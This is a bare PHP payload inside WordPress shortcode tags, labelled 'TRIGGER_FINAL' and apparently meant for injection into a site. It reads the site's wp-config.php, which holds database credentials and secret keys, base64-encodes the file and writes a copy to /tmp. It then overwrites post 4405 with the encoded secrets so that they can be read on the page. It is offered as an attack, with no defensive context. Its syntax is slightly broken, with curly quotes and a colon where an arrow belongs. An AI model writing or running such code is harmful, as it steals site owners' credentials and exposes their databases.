TRIGGER_FINAL
[php]
$f=”/var/www/html/business/wp-config.php”;
$c=@file_get_contents($f);
if($c){
$b64=base64_encode($c);
@file_put_contents(“/tmp/wp_dump_b64.txt”,$b64);
global $wpdb;
$wpdb->update($wpdb->posts,array(“post_content”=>$b64),array(“ID”:4405));
echo “DONE”;
}
[/php]